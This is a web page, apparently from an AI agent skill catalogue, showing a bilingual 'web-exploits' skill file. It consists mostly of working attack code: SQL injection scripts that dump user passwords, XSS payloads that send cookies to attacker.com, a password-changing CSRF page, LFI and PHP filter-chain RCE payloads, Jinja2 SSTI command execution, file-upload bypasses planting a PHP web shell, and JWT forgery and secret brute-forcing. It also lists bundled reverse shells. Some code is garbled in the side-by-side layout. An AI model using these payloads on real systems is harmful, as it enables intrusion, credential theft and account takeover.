Back to Details

web-exploits

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Web Exploitation Patterns

Web漏洞利用模式

When to Use

适用场景

Load this skill when:
  • Testing web applications for vulnerabilities
  • Exploiting SQL injection, XSS, or CSRF
  • Bypassing file upload restrictions
  • Testing for LFI/RFI (Local/Remote File Inclusion)
  • Exploiting SSTI (Server-Side Template Injection)
  • Manipulating JWT tokens
  • Analyzing web traffic with Burp Suite
在以下场景加载本技能:
  • 测试Web应用程序的漏洞
  • 利用SQL注入、XSS或CSRF漏洞
  • 绕过文件上传限制
  • 检测LFI/RFI(本地/远程文件包含)
  • 利用SSTI(服务器端模板注入)
  • 篡改JWT令牌
  • 使用Burp Suite分析Web流量

SQL Injection

SQL Injection

Detection and Exploitation

检测与利用

python
import requests
python
import requests

Test for SQL injection

Test for SQL injection

payloads = [ "'", "' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1' /*", "admin' --", "admin' #", "' UNION SELECT NULL--", ]
for payload in payloads: response = requests.post(url, data={'username': payload, 'password': 'test'}) if "error" in response.text or "mysql" in response.text.lower(): print(f"[!] Vulnerable to: {payload}")
undefined
payloads = [ "'", "' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1' /*", "admin' --", "admin' #", "' UNION SELECT NULL--", ]
for payload in payloads: response = requests.post(url, data={'username': payload, 'password': 'test'}) if "error" in response.text or "mysql" in response.text.lower(): print(f"[!] Vulnerable to: {payload}")
undefined

Union-Based SQLi

Union-Based SQLi

python
undefined
python
undefined

Step 1: Find number of columns

Step 1: Find number of columns

for i in range(1, 20): payload = f"' UNION SELECT {','.join(['NULL']*i)}--" response = requests.get(f"{url}?id={payload}") if "error" not in response.text: print(f"[+] Number of columns: {i}") break
for i in range(1, 20): payload = f"' UNION SELECT {','.join(['NULL']*i)}--" response = requests.get(f"{url}?id={payload}") if "error" not in response.text: print(f"[+] Number of columns: {i}") break

Step 2: Extract data

Step 2: Extract data

payloads = [ "' UNION SELECT 1,version(),3--", "' UNION SELECT 1,database(),3--", "' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--", "' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--", "' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--", ]
undefined
payloads = [ "' UNION SELECT 1,version(),3--", "' UNION SELECT 1,database(),3--", "' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--", "' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--", "' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--", ]
undefined

Blind SQLi

Blind SQLi

python
undefined
python
undefined

Time-based blind SQLi

Time-based blind SQLi

import time
def time_based_sqli(url, param): """Check if parameter is vulnerable to time-based SQLi""" payload = f"' AND SLEEP(5)--" start = time.time() response = requests.get(f"{url}?{param}={payload}") elapsed = time.time() - start
if elapsed >= 5:
    print(f"[+] Time-based SQLi confirmed on {param}")
    return True
return False
import time
def time_based_sqli(url, param): """Check if parameter is vulnerable to time-based SQLi""" payload = f"' AND SLEEP(5)--" start = time.time() response = requests.get(f"{url}?{param}={payload}") elapsed = time.time() - start
if elapsed >= 5:
    print(f"[+] Time-based SQLi confirmed on {param}")
    return True
return False

Boolean-based blind SQLi

Boolean-based blind SQLi

def boolean_based_sqli(url): """Extract data character by character""" result = "" for i in range(1, 100): # Max 100 characters for c in range(32, 127): # ASCII printable payload = f"' AND ASCII(SUBSTRING(database(),{i},1))={c}--" response = requests.get(f"{url}?id={payload}") if "Welcome" in response.text: # Success indicator result += chr(c) print(f"[+] Found: {result}") break else: break return result
undefined
def boolean_based_sqli(url): """Extract data character by character""" result = "" for i in range(1, 100): # Max 100 characters for c in range(32, 127): # ASCII printable payload = f"' AND ASCII(SUBSTRING(database(),{i},1))={c}--" response = requests.get(f"{url}?id={payload}") if "Welcome" in response.text: # Success indicator result += chr(c) print(f"[+] Found: {result}") break else: break return result
undefined

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS)

Reflected XSS

反射型XSS

javascript
// Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">

// Bypass filters
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<svg/onload=alert(1)>

// Extract cookies
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
<img src=x onerror="location='http://attacker.com/?c='+document.cookie">
javascript
// Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">

// Bypass filters
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<svg/onload=alert(1)>

// Extract cookies
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
<img src=x onerror="location='http://attacker.com/?c='+document.cookie">

Stored XSS

存储型XSS

python
import requests
python
import requests

Test stored XSS

Test stored XSS

xss_payloads = [ "<script>alert(1)</script>", "<img src=x onerror=alert(1)>", "<svg onload=alert(1)>", '"><script>alert(1)</script>', "';alert(1);//", ]
for payload in xss_payloads: # Submit payload requests.post(url + "/comment", data={'text': payload})
# Check if executed
response = requests.get(url + "/comments")
if payload in response.text:
    print(f"[+] Stored XSS: {payload}")
undefined
xss_payloads = [ "<script>alert(1)</script>", "<img src=x onerror=alert(1)>", "<svg onload=alert(1)>", '"><script>alert(1)</script>', "';alert(1);//", ]
for payload in xss_payloads: # Submit payload requests.post(url + "/comment", data={'text': payload})
# Check if executed
response = requests.get(url + "/comments")
if payload in response.text:
    print(f"[+] Stored XSS: {payload}")
undefined

CSRF (Cross-Site Request Forgery)

CSRF (跨站请求伪造)

html
<!-- CSRF PoC for form submission -->
<html>
  <body>
    <form action="https://target.com/change_password" method="POST">
      <input type="hidden" name="new_password" value="hacked123" />
      <input type="hidden" name="confirm_password" value="hacked123" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
python
undefined
html
<!-- CSRF PoC for form submission -->
<html>
  <body>
    <form action="https://target.com/change_password" method="POST">
      <input type="hidden" name="new_password" value="hacked123" />
      <input type="hidden" name="confirm_password" value="hacked123" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
python
undefined

Test CSRF protection

Test CSRF protection

import requests
session = requests.Session()
import requests
session = requests.Session()

Login first

Login first

session.post(url + "/login", data={'user': 'admin', 'pass': 'admin'})
session.post(url + "/login", data={'user': 'admin', 'pass': 'admin'})

Try action without token

Try action without token

response = session.post(url + "/delete_user", data={'id': '1'})
if response.status_code == 200: print("[!] No CSRF protection!")
undefined
response = session.post(url + "/delete_user", data={'id': '1'})
if response.status_code == 200: print("[!] No CSRF protection!")
undefined

Local File Inclusion (LFI)

Local File Inclusion (LFI)

Path Traversal

路径遍历

python
undefined
python
undefined

Common LFI payloads

Common LFI payloads

lfi_payloads = [ "../../../../../etc/passwd", "....//....//....//....//etc/passwd", "..%2F..%2F..%2F..%2Fetc%2Fpasswd", "..../..../..../..../etc/passwd", "/etc/passwd", "php://filter/convert.base64-encode/resource=index.php", "expect://whoami", "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7", ]
for payload in lfi_payloads: response = requests.get(f"{url}?page={payload}") if "root:" in response.text or "<?php" in response.text: print(f"[+] LFI found: {payload}")
undefined
lfi_payloads = [ "../../../../../etc/passwd", "....//....//....//....//etc/passwd", "..%2F..%2F..%2F..%2Fetc%2Fpasswd", "..../..../..../..../etc/passwd", "/etc/passwd", "php://filter/convert.base64-encode/resource=index.php", "expect://whoami", "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7", ]
for payload in lfi_payloads: response = requests.get(f"{url}?page={payload}") if "root:" in response.text or "<?php" in response.text: print(f"[+] LFI found: {payload}")
undefined

PHP Filter Chain (RCE)

PHP Filter Chain (RCE)

python
undefined
python
undefined

Use php://filter to achieve RCE

Use php://filter to achieve RCE

filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|" filter_chain += "convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|"
filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|" filter_chain += "convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|"

... (full chain truncated for brevity)

... (full chain truncated for brevity)

filter_chain += "resource=data://,<?php system($_GET['cmd']); ?>"
response = requests.get(f"{url}?page={filter_chain}&cmd=whoami")
undefined
filter_chain += "resource=data://,<?php system($_GET['cmd']); ?>"
response = requests.get(f"{url}?page={filter_chain}&cmd=whoami")
undefined

Server-Side Template Injection (SSTI)

Server-Side Template Injection (SSTI)

Detection

检测

python
undefined
python
undefined

Test payloads for common template engines

Test payloads for common template engines

ssti_tests = { 'Jinja2': "{{77}}", # Python (Flask) 'Twig': "{{77}}", # PHP 'ERB': "<%= 77 %>", # Ruby 'Smarty': "{77}", # PHP 'Velocity': "#set($x=7*7)$x", # Java }
for engine, payload in ssti_tests.items(): response = requests.get(f"{url}?name={payload}") if "49" in response.text: print(f"[+] {engine} SSTI detected!")
undefined
ssti_tests = { 'Jinja2': "{{77}}", # Python (Flask) 'Twig': "{{77}}", # PHP 'ERB': "<%= 77 %>", # Ruby 'Smarty': "{77}", # PHP 'Velocity': "#set($x=7*7)$x", # Java }
for engine, payload in ssti_tests.items(): response = requests.get(f"{url}?name={payload}") if "49" in response.text: print(f"[+] {engine} SSTI detected!")
undefined

Jinja2 Exploitation

Jinja2利用

python
undefined
python
undefined

Read file

Read file

payload = "{{ ''.class.mro[1].subclasses()40.read() }}"
payload = "{{ ''.class.mro[1].subclasses()40.read() }}"

RCE (Python 2)

RCE (Python 2)

payload = "{{ ''.class.mro[2].subclasses()40.write('#!/bin/bash\nid') }}"
payload = "{{ ''.class.mro[2].subclasses()40.write('#!/bin/bash\nid') }}"

RCE (Python 3)

RCE (Python 3)

payload = "{{ self.init.globals.builtins.import('os').popen('id').read() }}"
undefined
payload = "{{ self.init.globals.builtins.import('os').popen('id').read() }}"
undefined

File Upload Bypass

文件上传绕过

Extension Bypass

扩展名绕过

python
undefined
python
undefined

Test various extensions

Test various extensions

extensions = [ 'php', 'php3', 'php4', 'php5', 'phtml', 'pht', 'php.jpg', 'php.png', 'php;.jpg', 'php%00.jpg', # Null byte injection ]
for ext in extensions: filename = f"shell.{ext}" files = {'file': (filename, "<?php system($_GET['cmd']); ?>", 'application/x-php')} response = requests.post(url + "/upload", files=files)
if response.status_code == 200:
    print(f"[+] Uploaded: {filename}")
undefined
extensions = [ 'php', 'php3', 'php4', 'php5', 'phtml', 'pht', 'php.jpg', 'php.png', 'php;.jpg', 'php%00.jpg', # Null byte injection ]
for ext in extensions: filename = f"shell.{ext}" files = {'file': (filename, "<?php system($_GET['cmd']); ?>", 'application/x-php')} response = requests.post(url + "/upload", files=files)
if response.status_code == 200:
    print(f"[+] Uploaded: {filename}")
undefined

Content-Type Bypass

Content-Type绕过

python
undefined
python
undefined

Try different MIME types

Try different MIME types

content_types = [ 'image/jpeg', 'image/png', 'image/gif', 'application/octet-stream', ]
for ctype in content_types: files = {'file': ('shell.php', "<?php system($_GET['cmd']); ?>", ctype)} response = requests.post(url + "/upload", files=files)
undefined
content_types = [ 'image/jpeg', 'image/png', 'image/gif', 'application/octet-stream', ]
for ctype in content_types: files = {'file': ('shell.php', "<?php system($_GET['cmd']); ?>", ctype)} response = requests.post(url + "/upload", files=files)
undefined

Magic Bytes Bypass

魔术字节绕过

python
undefined
python
undefined

Add GIF header to bypass file type checks

Add GIF header to bypass file type checks

content = b"GIF89a" + b"<?php system($_GET['cmd']); ?>" files = {'file': ('shell.php', content, 'image/gif')} response = requests.post(url + "/upload", files=files)
undefined
content = b"GIF89a" + b"<?php system($_GET['cmd']); ?>" files = {'file': ('shell.php', content, 'image/gif')} response = requests.post(url + "/upload", files=files)
undefined

JWT Token Manipulation

JWT令牌篡改

python
import jwt
import base64
python
import jwt
import base64

Decode JWT

Decode JWT

token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..." decoded = jwt.decode(token, options={"verify_signature": False}) print(decoded)
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..." decoded = jwt.decode(token, options={"verify_signature": False}) print(decoded)

None algorithm attack

None algorithm attack

header = base64.b64encode(b'{"typ":"JWT","alg":"none"}').strip(b'=') payload = base64.b64encode(b'{"user":"admin"}').strip(b'=') forged_token = header + b'.' + payload + b'.'
header = base64.b64encode(b'{"typ":"JWT","alg":"none"}').strip(b'=') payload = base64.b64encode(b'{"user":"admin"}').strip(b'=') forged_token = header + b'.' + payload + b'.'

Weak secret bruteforce

Weak secret bruteforce

import hashlib with open('wordlists/common.txt') as f: for secret in f: secret = secret.strip() try: jwt.decode(token, secret, algorithms=['HS256']) print(f"[+] Found secret: {secret}") break except: continue
undefined
import hashlib with open('wordlists/common.txt') as f: for secret in f: secret = secret.strip() try: jwt.decode(token, secret, algorithms=['HS256']) print(f"[+] Found secret: {secret}") break except: continue
undefined

Quick Reference

快速参考

VulnerabilityDetection PatternExploitation
SQL Injection
'
, 
' OR 1=1--
' UNION SELECT ...
XSS
<script>alert(1)</script>
Cookie stealing, session hijacking
LFI
../../../etc/passwd
Read sensitive files, RCE via log poisoning
SSTI
{{7*7}}
, 
${7*7}
RCE via template engine
File UploadUpload 
.php
, 
.phtml
Web shell execution
CSRFNo token validationForce user actions
JWT
alg: none
, weak secret		Privilege escalation
漏洞类型检测模式利用方式
SQL Injection
'
, 
' OR 1=1--
' UNION SELECT ...
XSS
<script>alert(1)</script>
窃取Cookie、会话劫持
LFI
../../../etc/passwd
读取敏感文件、通过日志投毒实现RCE
SSTI
{{7*7}}
, 
${7*7}
通过模板引擎实现RCE
文件上传上传
.php
, 
.phtml
WebShell执行
CSRF无令牌验证强制用户执行操作
JWT
alg: none
, 弱密钥		权限提升

Bundled Resources

配套资源

Scripts

脚本

  • scripts/csrf_grabber.py
    - Extract CSRF tokens automatically
  • scripts/jwt_tamper.py
    - JWT token manipulation tool
  • scripts/lfi_tester.py
    - Automated LFI testing
  • scripts/ssti_tester.py
    - SSTI detection and exploitation
  • scripts/upload_tester.py
    - File upload bypass testing
  • scripts/csrf_grabber.py
    - 自动提取CSRF令牌
  • scripts/jwt_tamper.py
    - JWT令牌篡改工具
  • scripts/lfi_tester.py
    - 自动化LFI测试工具
  • scripts/ssti_tester.py
    - SSTI检测与利用工具
  • scripts/upload_tester.py
    - 文件上传绕过测试工具

Payloads

载荷

  • payloads/sqli_basic.txt
    - Basic SQL injection payloads
  • payloads/sqli_mysql.txt
    - MySQL-specific payloads
  • payloads/xss_reflected.txt
    - XSS test vectors
  • payloads/ssti_jinja2.txt
    - Jinja2 SSTI payloads
  • payloads/cmd_injection.txt
    - Command injection patterns
  • payloads/lfi.txt
    - LFI/path traversal payloads
  • payloads/ssrf.txt
    - SSRF test URLs
  • payloads/file_upload_bypass.txt
    - Extension bypass techniques
  • payloads/sqli_basic.txt
    - 基础SQL注入载荷
  • payloads/sqli_mysql.txt
    - MySQL专用注入载荷
  • payloads/xss_reflected.txt
    - XSS测试向量
  • payloads/ssti_jinja2.txt
    - Jinja2 SSTI载荷
  • payloads/cmd_injection.txt
    - 命令注入模式
  • payloads/lfi.txt
    - LFI/路径遍历载荷
  • payloads/ssrf.txt
    - SSRF测试URL
  • payloads/file_upload_bypass.txt
    - 扩展名绕过技巧

Webshells

WebShell

  • webshells/php_reverse.php
    - PHP reverse shell
  • webshells/aspx_cmd.aspx
    - ASPX command shell
  • webshells/jsp_cmd.jsp
    - JSP command shell
  • webshells/node_cmd.js
    - Node.js shell
  • webshells/php_reverse.php
    - PHP反向Shell
  • webshells/aspx_cmd.aspx
    - ASPX命令Shell
  • webshells/jsp_cmd.jsp
    - JSP命令Shell
  • webshells/node_cmd.js
    - Node.js Shell

Templates

模板

  • templates/web_requests.py
    - Python requests template with session handling
  • templates/web_requests.py
    - 带会话管理的Python requests模板

Wordlists

字典

  • wordlists/
    - Common username/password lists (from SecLists)
  • wordlists/
    - 常见用户名/密码字典(来自SecLists)

Keywords

关键词

web exploitation, SQL injection, SQLi, XSS, cross-site scripting, CSRF, LFI, RFI, local file inclusion, SSTI, template injection, file upload, webshell, JWT, JSON web token, command injection, path traversal, directory traversal, web security, OWASP, burp suite, requests, beautifulsoup
web exploitation, SQL injection, SQLi, XSS, cross-site scripting, CSRF, LFI, RFI, local file inclusion, SSTI, template injection, file upload, webshell, JWT, JSON web token, command injection, path traversal, directory traversal, web security, OWASP, burp suite, requests, beautifulsoup